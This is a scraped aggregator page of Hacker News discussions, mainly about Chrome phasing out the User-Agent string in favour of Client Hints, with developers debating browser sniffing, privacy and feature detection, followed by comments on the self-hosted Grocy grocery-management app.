© 2001-2020 Aral Balkan. View source. Unless otherwise stated, all source code is licensed under GNU AGPL version 3.0 or later and all other post content is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0). Built with Hugo and running on Site.js.



No comments posted yet: Link to HN comments page




Historical Discussions: Chrome phasing out support for User-Agent (March 25, 2020: 665 points)

(668) Chrome phasing out support for User-Agent

668 points 3 days ago by oftenwrong in 330th position

www.infoq.com | Estimated reading time – 3 minutes | comments | anchor

Google announced its decision to drop support for the User-Agent string in its Chrome browser. Instead, Chrome will offer a new API called Client Hints that will give the user greater control over which information is shared with websites.

The User-Agent string can be traced back to Mosaic, a popular browser in the early '90s, which sent a simple string containing just the browser name and its version. The string looked something like Mosaic/0.9 and saw little use.

When Netscape came out a few years later, it adopted the User-Agent string and added additional details such as the operating system, language, etc. These details helped websites to deliver the right content for the user, though in reality, the primary use case for the User-Agent string became browser sniffing.

Since Mosaic and Netscape supported a different set of functionalities, websites had to use the User-Agent string to determine the browser type to avoid using capabilities that were not supported (such as frames, that were only supported by Netscape).

Browser sniffing continued to play a significant part in determining the browser capabilities for many years, which led to an unfortunate side effect where smaller browser vendors had to mimic popular User-Agents to display the correct website - as many companies only supported the major User-Agent types.

With JavaScript's popularity rising, most developers have started using libraries such as Modernizr, which detect the specific capabilities of the browser, as this provides much more accurate results.
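
A minimal feature-detection sketch (plain browser JavaScript; illustrative probes, not Modernizr's actual code):

    // Probe for the capability itself instead of inferring it from the UA.
    const supportsLocalStorage = (() => {
      try {
        localStorage.setItem("__probe__", "1");
        localStorage.removeItem("__probe__");
        return true;
      } catch {
        return false;
      }
    })();

    const supportsWebGL = !!document.createElement("canvas").getContext("webgl");

    console.log({ supportsLocalStorage, supportsWebGL });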

As a result, the most significant usage for the User-Agent remained within the advertising industry, where companies used it to 'fingerprint' users, a practice that many privacy advocates found to be problematic - mainly as most users had limited options to disable/mask those details.

To combat these two problems, the Chrome team will start phasing out the User-Agent beginning with Chrome 81.

While removing the User-Agent completely was deemed problematic, as many sites still rely on it, Chrome will no longer update the browser version within the string and will only include a unified version of the OS data.

The move is scheduled to be complete by Chrome 85, which is expected to be released in mid-September 2020. Other browser vendors, including Mozilla Firefox, Microsoft Edge, and Apple Safari, have expressed their support for the move. However, it's still unclear when they will phase out the User-Agent themselves.

You can read more about Chrome's proposed alternative to the User-Agent in an article titled 'Client Hints' on the official GitHub repository. As with every proposal, the exact implementation may change before its release, and developers are advised to keep track of the details within the repository as well as the release notes provided with new versions of Chrome.
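
To illustrate the proposed flow, here is a hedged sketch using Node with Express; the header names follow the proposal as described above and may change before release:

    import express from "express";

    const app = express();

    app.get("/", (req, res) => {
      // Opt in: ask the browser to send UA client hints on later requests.
      res.set("Accept-CH", "Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Full-Version");

      // Read whatever hints the browser chose to share.
      const brand = req.get("Sec-CH-UA") ?? "not provided";
      const platform = req.get("Sec-CH-UA-Platform") ?? "not provided";
      res.send(`brand: ${brand}, platform: ${platform}`);
    });

    app.listen(3000);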




All Comments: [-] | anchor

gregoriol(4343) 3 days ago [-]

As usual, this will fuck things up for the users: not the techy nerds making such decisions, but the average joe, because things on the internet will be broken for them.

tenebrisalietum(10000) 3 days ago [-]

Give an example.

keyme(4276) 3 days ago [-]

This last year I've been noticing things breaking on the internet for me here and there. I'm a Firefox user. This really wasn't the case for most of the past decade.

This reminds me of the late 00's, when it was quite common that the odd government or enterprise website was IE6-only.

All hail the new IE6.

untog(2451) 3 days ago [-]

How will things be broken? Google is not removing the user agent, they're just freezing it. So all sites that currently depend on the user agent will continue to do just fine. New sites can use client hints instead, which are a much more effective replacement for user agent sniffing.

This solution very specifically places the burden on 'techy nerds' and not users, so I'm not sure where you're coming from.

voiper1(4338) 3 days ago [-]

Seems they considered this issue and created a work-around:

>While removing the User-Agent completely was deemed problematic, as many sites still rely on them, Chrome will no longer update the browser version and will only include a unified version of the OS data.

onion2k(2103) 3 days ago [-]

this will fuck up the users

That's a downside if it happens, but the upsides (privacy, forcing devs to use feature detection instead, etc.) still mean it's worthwhile.

myko(1950) 3 days ago [-]

This is unquestionably good though.

Instead of relying on a user agent, which doesn't tell the entire story, website developers will need to check whether or not a feature exists in a browser before using it.

surround(4303) 3 days ago [-]

Good. User-agent strings are a mess. Here is an example of a user-agent string. Can you tell what browser this is?

    Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

How did they get so confusing? See: History of the browser user-agent string https://webaim.org/blog/user-agent-string-history/

Also, last year, Vivaldi switched to using a user-agent string identical to Chrome's because websites refused to work for Vivaldi, but worked fine with a spoofed user-agent string. https://vivaldi.com/blog/user-agent-changes/

rplnt(2478) 3 days ago [-]

If companies like Google wouldn't abuse the user agent string to block functionality, serve ads, and force users onto specific browsers, then companies like Google wouldn't have to use fake UA strings, and then maybe companies like Google wouldn't have to drop support for it.

dirtydroog(10000) 3 days ago [-]

Anything to do with HTTP is a mess!

jsjddbbwj(10000) 2 days ago [-]

Chrome 0.2 on Windows XP?

ravenstine(10000) 3 days ago [-]

This is a good idea, and is something I've thought of for a while; the user agent header was a mistake from both a privacy and a UX perspective.

Ideally, web browsers should attempt to treat the content the same no matter what device you are on. There shouldn't be an iOS-web, and a Chrome-web, and a Firefox-web, and an Edge-web; there should just be the web. In which case, a user-agent string that contains the browser and even the OS only encourages differences between browsers. Adding differences to your browser engine shouldn't be considered safe.

Beyond that, the user agent is often a lie to trick servers into not discriminating against certain browsers or OSes. Enough variability is added to the user-agent string that a server can't reliably discriminate, but it still remains useful for some purposes in JavaScript and as a fingerprint for tracking.

Which brings me to privacy. It's not as if there aren't other ways to try and fingerprint a browser, but the user agent is a big mistake for privacy. It'd be one thing if the user-agent just said 'Safari' or 'Firefox', but there's a lot more information in it beyond that.

If the web should be the same web everywhere, then the privacy trade-off doesn't make much sense.

tempestn(1556) 2 days ago [-]

One problem with this is that browsers don't behave the same. For example, iOS Safari prevents multiple pop-up windows from being opened by a single user interaction. Each one requires clicking back to the original page and allowing the popup. Now you might say, 'Why would you ever want to do that?' But there are always going to be edge cases; in this case it's an integral part of one of the features of autotempest.com. And that's just one example. The only way we can detect whether that behaviour is going to be blocked is by checking the UA.

I can understand why this is a good thing for privacy. Like many things to do with security on the web though, it's just a shame that bad actors have to ruin so many things for legitimate uses. (The recent story on Safari local storage being another example of that...)

nerdponx(3750) 3 days ago [-]

I don't know.

If I'm connecting to a site with Lynx, I sure as heck don't want them to try to serve me some skeleton HTML that will be filled in with JS. Because my browser doesn't support JS, or only supports a subset of it.

User Agent being a completely free form field is the real mistake IMO. Having something more structured, like Perl's 'use' directive, might have been better.

ldoughty(10000) 3 days ago [-]

I agree, but this also is incredibly dependent on the major players (e.g. Google) not going off on their own making changes without agreement from other browsers...

There are still issues today where Chrome, Edge, and Firefox render slightly differently. I certainly agree the user agent isn't terribly necessary, but it's literally the only hook to identify when CSS or JavaScript needs to change... or to support people on older browsers (e.g. Firefox ESR). How can I know when I can update my website to newer language versions without metrics confirming my users support the new ES version?

I would argue for simplifying the UA: product + major revision, maybe, or only information relevant to rendering and JavaScript.

varelaz(10000) 3 days ago [-]

That just makes things harder for those who want this information. You can still fingerprint a browser by its features and API support, but that now requires JavaScript and an up-to-date library that checks for recently added features. My point is that this doesn't prevent obtaining the information; it's still available to the big players who have big data.

superkuh(4146) 3 days ago [-]

User-agent is super useful to human people, but corporate people don't have a use for it; they will get that information by running arbitrary code on your insecure browser anyway. So, because mega-corps now define the web (instead of the W3C), this is life.

But it doesn't have to be. We don't have to follow Google/Apple web standards. Anyone who makes and runs websites has a choice. And every person can simply choose not to run unethical browsers.

DevKoala(4133) 3 days ago [-]

Not sure why you are being downvoted, since your statements are correct.

Few advertisers rely on the user agent for ad targeting, since it can easily be spoofed with each HTTP request. It is used for fingerprinting, sure, but in my experience mostly as a way to identify bot traffic.

It is also true that the advertisers that fingerprint people rely on JS that executes WebGL code in order to get data from the machine.

Finally, you are right that it doesn't make sense that a company like Google dictates these standards since they have a conflict of interests worth almost a trillion dollars.

zzo38computer(10000) 3 days ago [-]

Unfortunately they are either unethical or have other problems (or, most commonly, both); I have made suggestions on how to make a better one. See my other comment elsewhere, where I explain.

recursive(10000) 2 days ago [-]

> User-agent is super useful to human people.

For what? Honest question. You have to be like a 5th-level user agent wizard to make any sense of user agent strings, since every browser now names every other browser. How do you do anything useful with this in a way that's forward-compatible?

derefr(3807) 3 days ago [-]

These days, it feels like the sole use of User-Agent is as a weak defence against web scraping. I've written a couple of scrapers (legitimate ones, for site owners that requested machine-readable versions of their own data!) where the site would reject me if I did a plain `curl`, but as soon as I hit it with -H 'User-Agent: [my chrome browser's UA string]', it'd work fine. Kind of silly, when it's such a small deterrent to actually-malicious actors.

(Also kind of silly in that even real browser-fingerprinting setups can be defeated by a sufficiently-motivated attacker using e.g. https://www.npmjs.com/package/puppeteer-extra-plugin-stealth, but I guess sometimes a corporate mandate to block scraping comes down, and you just can't convince them that it's untenable.)

jaywalk(10000) 3 days ago [-]

Preventing scraping is an entirely futile effort. I've lost count of the number of times I've had to tell a project manager that if a user can see it in their browser, there is a way to scrape it.

Best I've ever been able to do is implement server-side throttling to force the scrapers to slow down. But I manage some public web applications with data that is very valuable to certain other players in the industry, so they will invest the time and effort to bypass any measures I throw at them.
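
A naive sketch of that kind of throttling (TypeScript with Express; in-memory counters for illustration only, a real deployment would use a shared store):

    import express from "express";

    const WINDOW_MS = 60_000;   // 1-minute window
    const MAX_PER_WINDOW = 100; // requests allowed per IP per window
    const hits = new Map<string, { count: number; windowStart: number }>();

    const app = express();
    app.use((req, res, next) => {
      const ip = req.ip ?? "unknown";
      const now = Date.now();
      const entry = hits.get(ip);
      if (!entry || now - entry.windowStart > WINDOW_MS) {
        hits.set(ip, { count: 1, windowStart: now }); // fresh window for this IP
        return next();
      }
      if (++entry.count > MAX_PER_WINDOW) {
        return res.status(429).send("Too Many Requests");
      }
      next();
    });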

cirno(10000) 3 days ago [-]

Checking the user-agent string for scrapers doesn't work anyway. In addition to using dozens of proxies in different IP address blocks, archive.is spoofs its user agents to be the latest Chrome release and updates it often.

stirner(4338) 3 days ago [-]

Meanwhile, you can still use youtube.com/tv to control playback on your PC from your phone—but only if you spoof your User-Agent to that of the Nintendo Switch [1]. Sounds like they are more interested in phasing out user control than ignoring the header entirely.

[1] https://support.google.com/youtube/thread/16442768?hl=en&msg...

ahmedalsudani(4275) 3 days ago [-]

Oh wow. I used that in the past and it worked great. I didn't realize Google broke it only to force us to use their app.

What a bunch of turds.

Thank you for the Nintendo Switch pro-tip.

jakeogh(3365) 2 days ago [-]

Fantastic. Thank you, Chrome team! Especially for those who don't execute arbitrary JS, this is a huge +.

Personally, I would like them to drop the header completely and not send the key at all, but it's a start.

maverick74(4076) 1 day ago [-]

totally agree!!!

manigandham(779) 3 days ago [-]

I would much prefer a new version of the user-agent string: normalize basic information (like OS and browser versions) without revealing too much (build numbers).

That would let servers still get the necessary info without having to run even more JavaScript. It could just be in querystring format to simplify parsing on both client and server.
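
For example (a sketch; the field names are made up):

    // A normalized, querystring-style UA is trivial to parse on both ends.
    const ua = new URLSearchParams("browser=Chrome&v=74&os=macOS&osv=10.15");
    console.log(ua.get("browser"), ua.get("v")); // "Chrome" "74"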

recursive(10000) 2 days ago [-]

Any user agent string will eventually be forced down the same path. Web sites use them to deny content. And the browsers will continue to try to match more patterns so their users see the content.

As long as they exist, I can see no escaping this arms race.

hartator(3776) 3 days ago [-]

New proposed syntax adds even more noise:

    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
        AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.1.2222.33 Safari/537.36
    Sec-CH-UA: 'Chrome'; v='74'
    Sec-CH-UA-Full-Version: '74.0.3424.124'
    Sec-CH-UA-Platform: 'macOS'
    Sec-CH-UA-Arch: 'ARM64'

Why not get rid of the `User-Agent` completely?

It's already bad infrastructure design to have the server do different renderings depending on the `User-Agent` value.

magicalhippo(10000) 3 days ago [-]

Why the hell does a regular website need to know what OS and CPU architecture I got?

collinmanderson(1532) 2 days ago [-]

Yeah, aren't we just making things a lot more messy? Especially if we're not planning on removing the User-Agent header?

This pattern keeps repeating itself, freeze 'Mozilla/5.0', start changing 'Chrome/71.1.2222.33', freeze that, start changing 'Sec-CH-UA', etc. Browsers will start needing to fake 'Sec-CH-UA' to get websites to work properly, etc.

afandian(4107) 3 days ago [-]

It's great design if you're trying to push Google products.

userbinator(703) 3 days ago [-]

Why not getting rid of the `User-Agent` completely?

Try browsing the web without any UA header for a week or two, and you'll understand. You get blank pages, strange server errors, and other weird behaviour --- almost always on very old sites, but then again, those also tend to be the sites with the content you want. Using a UA header, even if it's a dummy one, will at least not have that problem.

(I did the above experiment a long time ago - around 2008-2009. I'm not sure whether sites which expect a UA have increased or decreased since then.)

I agree with getting rid of all that new noise, however.

kalleboo(4083) 2 days ago [-]

I can understand including the browser and version (to work around bugs that are not detectable with feature detection), and the OS; OK, I guess there are also a few OS-specific bugs?

What the heck is the CPU architecture good for?

eric_b(10000) 3 days ago [-]

This feels very ivory tower. It reminds me of 'You should never need to check the user agent in JavaScript because you should just feature-detect!!' Well, in the real world that doesn't work every time.

The same is true for server-side applications of the user agent. There are plenty of non-privacy-invading reasons to need an accurate picture of which user agent is visiting.

And a lot of those applications that need it are legacy. Updating them to support these 6 new headers will be a pain.

recursive(10000) 3 days ago [-]

Most of the time when people use user agent for a purpose they think is appropriate, it doesn't even work correctly. YMMV

jacobr1(10000) 3 days ago [-]

Chrome will support legacy apps by maintaining a static user agent; it just won't be updated when Chrome updates. If you want to build NEW functionality where you need to test support in new browsers, you do that via feature detection.

vxNsr(3086) 3 days ago [-]

> https://github.com/WICG/ua-client-hints

I don't really understand how this will result in any real difference in privacy or homogeneity of the web. Realistically every browser that implements this is gonna offer up all the info the server asks for because asking the user each time is terrible UX.

Additionally, this will allow Google to further segment out any browser that doesn't implement this, because they'll ask for it, get `null` back, and respond with 'sorry, we don't support your browser'. Only now you can't just change your UA string and keep going; now you actually need to change your browser.

And if other browsers do decide to implement it, they'll just lie and claim to be chrome to make sure sites give the best exp... so we're back to where we started.

untog(2451) 3 days ago [-]

> I don't really understand how this will result in any real difference in privacy or homogeneity of the web.

It does a little: sites don't passively receive this information all the time, instead they have to actively ask for it. And browsers can say no, much like they can with blocking third party cookies.

In any case I'm not sure privacy is the ultimate goal here: it's intended to replace the awful user agent sniffing people currently have to do with a sensible system where you query for what you actually want, rather than infer it from what's available.

olsonjeffery(4340) 3 days ago [-]

At my employer we are using the UserAgent to detect the browser so that we can drive SameSite cookie policy for our various sites (e.g. IE11 and Edge, which we still support, don't support SameSite: None).

There are a variety of scenarios where this comes up (e.g. we ship a site that is rendered, by another vendor, within an iframe, so we have to set SameSite: None on our application's session cookie for it to be valid within the iframe, thus allowing AJAX calls originating from within the iframe to work under our current auth scheme... BUT only in Chrome 70+ and Firefox, NOT IE, Safari, etc.).

Just providing this as an example of backend applications needing to deal with browser-specific behavior, since most of the examples cited in other comments are about rendering/css/javascript features on the client and how UserAgent drives that.
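
A sketch of that kind of workaround (TypeScript with Express; the checks are illustrative, not a complete incompatible-client list):

    import express from "express";

    // Clients known to mishandle `SameSite=None` (illustrative subset only).
    function supportsSameSiteNone(ua: string): boolean {
      if (/Trident\/|MSIE /.test(ua)) return false;              // IE 11 and older
      if (/iPhone OS 12_|Mac OS X 10_14/.test(ua)) return false; // old Safari bug
      return true;
    }

    const app = express();
    app.get("/embedded", (req, res) => {
      const ua = req.get("User-Agent") ?? "";
      const attrs = ["Path=/", "HttpOnly"];
      // Only add the attribute for clients that won't reject the cookie.
      if (supportsSameSiteNone(ua)) attrs.push("SameSite=None", "Secure");
      res.set("Set-Cookie", `session=opaque-id; ${attrs.join("; ")}`);
      res.send("ok");
    });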

jt2190(4260) 3 days ago [-]

The proposed User Agent Client Hints API would replace this: https://wicg.github.io/ua-client-hints/

anthonyrstevens(4339) 3 days ago [-]

We are in the same boat. Certain browser/OS combinations don't handle Same-Site correctly, so we are using UA sniffing to work around their limitations by altering Same-Site cookie directives for those browsers. We will likely have to look at some other mechanism for dealing with nonconforming Same-Site behavior.

donatj(3615) 3 days ago [-]

The good news on that front is that IE11 and non-Chromium versions of Edge will likely never stop supporting UserAgent

intsunny(10000) 3 days ago [-]

Ah, the end of the countless references to KHTML :)

As a long time KDE user I'm a little sad, but also fully aware this day would come.

marcosdumay(10000) 3 days ago [-]

How can we use a browser that doesn't pretend to be Netscape Navigator? This will never work :)

leeoniya(2648) 3 days ago [-]

does this mean there will no longer be a way of determining if the device is primarily touch (basically all of 'android', 'iphone' and 'ipad') or guesstimating screen size ('mobile' is typical for phones in the UA) on the server?

https://developer.chrome.com/multidevice/user-agent

i wonder what Amazon will do. they serve completely different sites from the same domain after UA-sniffing for mobile.

is the web just going to turn into blank landing pages that require JS to detect the screen size and/or touch support and then redirect accordingly?

or is every initial/landing page going to be bloated with both the mobile and desktop variants?

that sounds god-awful.

bdcravens(1046) 3 days ago [-]

Presumably you'll grab the dimensions (could cache after first load) and then render dynamically based on that. If you're doing some sort of if statement on the server to deliver content based on screen size you're probably doing it wrong. Obviously I can't speak for every mobile user, but for myself, it's infuriating to have a completely different set of functionality on mobile.
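
One way to do the 'cache after first load' part (a sketch; 'vw' is an arbitrary cookie name, and the server-side read is left out):

  // Stash the viewport width in a cookie so the server can pick a layout
  // on subsequent requests instead of sniffing the user agent.
  function rememberViewport(): void {
    document.cookie = `vw=${window.innerWidth}; Max-Age=2592000; Path=/; SameSite=Lax`;
  }

  window.addEventListener('DOMContentLoaded', rememberViewport);
  window.addEventListener('resize', rememberViewport);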

ohthehugemanate(4344) 3 days ago [-]

browser feature detection is the way grown up developers have been doing this for several years now. user agent sniffing is dumb because it bundles a ton of assumptions with a high upkeep requirement, all wrapped up in an unreadable regex. It's been bad practice for ages; I'd be surprised if that's how Amazon is doing it still.

KingOfCoders(4330) 2 days ago [-]

Any idea on how to identify devices then? We currently check the user agent to send a new code when a user logs in from a new device. How would you do this without the user agent?

SifJar(3849) 2 days ago [-]

Use a cookie?
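
i.e. something like a long-lived random device token instead of a UA fingerprint; a minimal sketch (the cookie name and lifetime are arbitrary):

  import { randomBytes } from 'crypto';

  // If the request carries no device token, this is a "new device":
  // mint a token, set the cookie, and trigger the extra login code.
  function deviceToken(existing: string | undefined): { token: string; setCookie?: string } {
    if (existing) return { token: existing }; // known device
    const token = randomBytes(16).toString('hex');
    return {
      token,
      setCookie: `device_token=${token}; Max-Age=31536000; Secure; HttpOnly; SameSite=Lax`,
    };
  }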

abhishekjha(4166) 3 days ago [-]

I was wondering. Isn't the page rendered on mobile and desktop based on user-agents? How would that work now?

niea_11(10000) 3 days ago [-]

If you want to just change the styling and layout of the page depending on the user's device, then you can use css's media queries[0]. But if you want to serve two totally different pages (one for mobile and another for desktop), then I don't see how it can be done without JS or reading the user agent.

[0] : https://developer.mozilla.org/en-US/docs/Web/CSS/Media_Queri...

fny(4155) 3 days ago [-]

They're not phasing out User-Agent strings entirely; they're actually upgrading them: https://github.com/WICG/ua-client-hints

It looks like there's more fine-grained control in the new version.

tenebrisalietum(10000) 3 days ago [-]

I thought it used JavaScript to detect screen size. At least it should react to resize events, and if the dimensions align with mobile, it should switch to mobile mode.

untog(2451) 3 days ago [-]

Not usually, no. CSS media queries are used to format according to display size. But as a sibling here has indicated, client hints will replace the user agent here.

kryptiskt(708) 3 days ago [-]

The typical way this is done these days is by media queries in CSS, so you'd write a rule for styling based on screen width, like

        @media (max-width: 550px) {
           body {
              background-color: white;
           }
        }

turns the background white on small screens.
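
And for anyone who has to react to the same breakpoint from script, the matchMedia counterpart (a small sketch matching the 550px rule above):

  // React to the breakpoint without touching the user agent.
  const smallScreen = window.matchMedia('(max-width: 550px)');

  function applyLayout(matches: boolean): void {
    document.body.style.backgroundColor = matches ? 'white' : '';
  }

  applyLayout(smallScreen.matches);                        // initial state
  smallScreen.addListener((e) => applyLayout(e.matches));  // fires when crossing 550px
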
StillBored(10000) 3 days ago [-]

Can't happen soon enough. As a frequent user of various non-mainstream browsers, I'm sick and tired of seeing 'your browser isn't supported' messages with download links to Chrome/etc. At least in the case of Falkon it has a built-in user agent manager, and I can't remember the last time flipping the UA to Firefox/whatever actually caused any problems. Although I've also gotten annoyed at the sanctimonious web sites that tell me my browser is too old because the FF version I've got the UA set to isn't the latest.

y_nk(10000) 1 day ago [-]

If your browser isn't supported, it's not the browser's fault; it's the fault of the website you visit for not supporting your browser.

jorams(4059) 3 days ago [-]

The weird thing about this is that the only company I've seen doing problematic user-agent handling in recent years is Google themselves. They have released several products as Chrome-only, which then turned out to work fine in every other browser if they just pretended to be Chrome through the user agent. Same with their search pages, which on mobile were very bad in every non-Chrome browser purely based on user agent sniffing.

arendtio(10000) 3 days ago [-]

Ikea does it too with some of their tools (just sucks).

asveikau(10000) 3 days ago [-]

A fair number of websites will still block perfectly working features based on what OS you use.

Some examples I've seen using the latest Firefox on *BSD:

Facebook won't let you publish or edit a Note (not a normal post, the builtin Notes app). I think earlier they wouldn't play videos but they might have fixed that.

Chase Bank won't let you log in. Gives you a mobile-looking UI which tells you to upgrade to the latest Chrome or Firefox.

In these cases if you lie and say you're using Linux or Windows it works flawlessly.

cdata(4322) 2 days ago [-]

Chrome team members are face-palming with the best of us whenever a Google product does backwards things like filtering based on user agent string.

Google isn't a singularity.

willvarfar(534) 2 days ago [-]

To get Microsoft Teams to run in Chromium there used to be a user-agent hack to make it pretend to be Chrome. This was superseded by someone packaging it up using Electron. And finally this has been superseded by Microsoft themselves supporting Linux using something that looks and feels like Electron again.

So, basically, Microsoft using the user agent to detect Chrome...

AndrewKemendo(2823) 3 days ago [-]

I would guess they have built something into Chrome that gets even more data that isn't user-agent based.

The UA has a lot of limitations, and for power users it's fairly easy to work around giving it data. I would imagine Google didn't want to keep playing around with that.

sergiotapia(795) 3 days ago [-]

'Oopsie' said Google to Firefox.

jaywalk(10000) 3 days ago [-]

I'm sure Google won't build in some proprietary way for them to identify Chrome.

/s

rovek(10000) 3 days ago [-]

I had been thinking recently, as I've been using Firefox more, that Google Maps had got clunky. With a little fiddling prompted by your comment, it turns out Maps sniffs specifically to reduce fluid animations on Firefox (and probably some other browsers).

currysausage(3962) 3 days ago [-]

If you have the new Chromium-based Edge ('Edgium') installed: the compatibility list at edge://compat/useragent is really interesting.

Edgium pretends to be Chrome towards Gmail, Google Play, YouTube, and lots of non-Google services; on the other hand, it pretends to be Classic Edge towards many streaming services (HBO Now, DAZN, etc.) because it supports PlayReady DRM, which Chrome doesn't.

[Edit] Here is the full list: https://pastebin.com/YURq1BR1

eh78ssxv2f(4045) 3 days ago [-]

Google is probably so big that we might as well consider Chrome and the rest of Google as separate entities.

rocky1138(732) 3 days ago [-]

Facebook also uses the user-agent string to determine which version of a site to send to someone. I installed a user-agent spoofer a while back and messenger.com would fail due to it every few refreshes (as evidenced by JS console).

otabdeveloper2(10000) 2 days ago [-]

> ...which then turned out to work fine in every other browser if they just pretended to be Chrome through the user agent.

Which is probably why Google wants to phase out the user agent.

For sure whatever Google invents to replace it will not be so easily circumvented.

thaumasiotes(3782) 3 days ago [-]

> They have released several products as Chrome-only, which then turned out to work fine in every other browser if they just pretended to be Chrome through the user agent.

This seems like a pretty good reason in itself why they might be interested in phasing out User-Agents.

blntechie(4254) 3 days ago [-]

Every single Google product is slower on Firefox, and it's hard not to call this malicious and artificial. Many people check out Gmail and GMaps on Firefox and go back to Chrome because of their clunkiness on Firefox.

rozab(10000) 3 days ago [-]

I know Netflix used to block the Firefox on Linux user agent for no reason

dhimes(2852) 3 days ago [-]

Exactly. This is going to turn into a game of whack-a-mole whereby we need to load the latest firefox extension that tricks websites into thinking we're using Chrome.

Or we could build for Firefox. There's always that.

jacobolus(4000) 3 days ago [-]

Here in Safari, Gmail is not only 10x buggier than it used to be before the redesign, it also uses at least 10x more client-side resources (CPU, network, ...). A handful of open Gmail tabs single-handedly use more CPU over here than hundreds of other web pages open simultaneously, including plenty of heavyweight app-style pages.

It's hard to escape the conclusion that Google's front-end development process is completely incompetent and has no respect for customers' battery or bandwidth.

heavyset_go(4321) 3 days ago [-]

Some Google properties are broken on Chromium, even.

fpoling(3619) 3 days ago [-]

The thing that replaces the user agent will still be enough to differentiate Chrome from Firefox and Safari.

basscomm(10000) 3 days ago [-]

> The weird thing about this is that the only company I've seen doing problematic user-agent handling in recent years is Google themselves.

I frequently consume web articles with a combination of newsboat + Lynx, and it's astounding how many websites throw up HTTP 403 messages when I try to open a link. They're obviously sniffing my user agent, because if I blank out the string (more accurately, just the 'libwww-FM' part), the site will show me the correct page.

I'm pretty sure that the webmasters responsible for this are using user agent string blocking as a naive attempt to block bots from scraping their site, but that assumes that the bots they want to block actually send an accurate user agent string in the first place.





Historical Discussions: Grocy: web-based, self-hosted grocery and household management (March 21, 2020: 648 points)

(648) Grocy: web-based, self-hosted grocery and household management

648 points 7 days ago by jka in 4309th position

grocy.info | comments | anchor

ERP beyond your fridge

grocy is a web-based self-hosted groceries & household management solution for your home.

Open Source. Built with passion.

Download Demo

Changelog Install guide Source on GitHub

Current version: 2.6.1 (released on 03/06/2020)

A webserver with PHP 7.2 (or higher) and the SQLite (PDO) extension is required. Currently available localizations: English, German, Danish, Spanish, French, Hungarian, Italian, Dutch, Norwegian, Polish, Portuguese (Brazil), Portuguese (Portugal), Russian, Slovak, Swedish, Turkish and Czech




All Comments: [-] | anchor

samstave(3899) 7 days ago [-]

I freaking applied for HN with this idea and was rejected.. years ago.

Called "standard pantry"

bdcravens(1046) 7 days ago [-]

Remember, a piece of software isn't necessarily a business.

Also, HN!=YC. I assume you meant you applied for YC?

miguelrochefort(915) 6 days ago [-]

Didn't we all?

It's an obvious idea like all the others. We're 2 years from a viable implementation.

sergiotapia(795) 7 days ago [-]

- No business model

- Families (arguably the people who would use this) probably won't use this. It's too much time overhead for minimal gains.

Don't sweat it.

endorphone(3093) 7 days ago [-]

This doesn't validate the idea, if that's what you're implying.

To be necessarily negative, this sort of product has appeared countless times. It fills a need that people just don't have. I have four kids, a wife, a dog, a skinny pig and a bearded dragon. I can internalize shopping lists, as does my wife. It is incredibly rare that we even send reminders to each other of things. The idea of creating and managing an inventory system is just a complete non-starter.

floatingatoll(4062) 7 days ago [-]

What was your revenue model?

jldugger(4306) 7 days ago [-]

I appreciate the community effort but this thing is waaay too unfocused. Batteries, chores and a todo list?

I've been using an app called Cinnamon to handle grocery shopping. The general idea is similar: define a bunch of things you want to keep in stock in your pantry. Every two weeks before a shopping run I do a sub-five minute scan. The app groups by category, which usually helps keep it fast. Anything I'm low on swipe left and it's on the buy list.

In the grocery store, swipe left again as you buy and it's in the cart. Swipe right for 'next time.' (After a certain amount of time, anything in your cart is presumed to have moved back into the pantry, and anything in next time moves to buy list). For multiperson households, you could split the buy list construction from the acquisition.

I guess the key realization here is that data entry is simpler if you only check before planned grocery store runs, and if you can predict how much you need on hand to last between shopping runs. For toiletries it's a pretty quick 'do I have an unopened one still?' For food, I know some people use meal planning, but I just keep stuff on hand and wing it -- spices keep for quite a while and meat freezes fine.

opsgal(10000) 7 days ago [-]

Link to the Cinnamon app? I didn't see anything matching the description when I searched the App Store.

znpy(1612) 7 days ago [-]

I guess you're not understanding the scope.

It's not an overkill shopping list; it's more of a small-scale inventory management system.

skyfaller(10000) 7 days ago [-]

This is a cool concept, but in addition to all of the concerns other people have voiced, I have a very specific problem: I've been trying to go 'zero waste' and reduce packaging as much as possible. This means there is no package to scan; I'm just buying in bulk and putting stuff into bags/jars. There's also no clear expiration date, which is actually somewhat troubling these days, but so far I haven't had bulk stuff go bad b/c I wasn't stockpiling/prepping it.

We'll see what happens during the pandemic, that's definitely thrown a wrench into my low-packaging shopping.

pfranz(10000) 7 days ago [-]

Another thread showed a project that prints labels with QR codes, which might be a good fit if you're willing to compromise on sticker labels in your zero-waste goals.

https://www.thingybase.com/

I use frog tape and a sharpie. After a year+ I'm still on my first roll of frog tape.

If you really want to go zero waste you could use some sort of color-coding system, like bread clips use.

njsubedi(3994) 7 days ago [-]

Then stop what you're doing for a while. Problem solved.

satyrnein(4339) 7 days ago [-]

One thought to reduce data entry (for some people): parse freshdirect (etc) emails, with a default expiration date put in. (The pie in the sky version uses machine learning to make better guesses.)

Mathnerd314(3768) 7 days ago [-]

Just from trying the demo, there are default 'shelf life' numbers for the vegetables. But it expects best-by dates for the other stuff. It looks like defaults could be entered in.

fmajid(10000) 5 days ago [-]

I've known about this project for a while, but the coronavirus lockdown led me to install it. Unfortunately, the JavaScript-based UPC/EAN barcode scanning is unusable. Too slow, even on a 2018 Mac Pro, sometimes only scans a partial barcode, and asks for permission to access the camera for every scan. I've ordered a USB bar code scanner, I'll see if that makes it more usable.

I used to have a really neat device called the Hiku. It was essentially a WiFi-enabled hockey-puck sized scanner, with a microphone for voice recognition for items without bar codes, and a UPC database. Sadly they went out of business a few years ago but their app still works (not sure if new users can sign up for it), and is great for shared shopping, e.g. yesterday I was shopping and I could see my wife add items to the list in real time, as well as cross them out.

My main challenge is that I downsized to a much smaller apartment, and a lot of our dry groceries have to go in plastic bins that are shoved in dark corners, so it's hard to know what we have or don't have, leading to duplicated purchases and also wasted food when it expires.

One challenge is the absence of a good universal UPC/EAN database. I tried one with one item from the bin (a box of some obscure knock-offs of Meiji Chocorooms), and when the phone scanner finally managed to get the item right, the online DB identified it as a Disney Princess doll, so it seems UPC/EAN is so badly managed they can't even avoid duplicate codes.

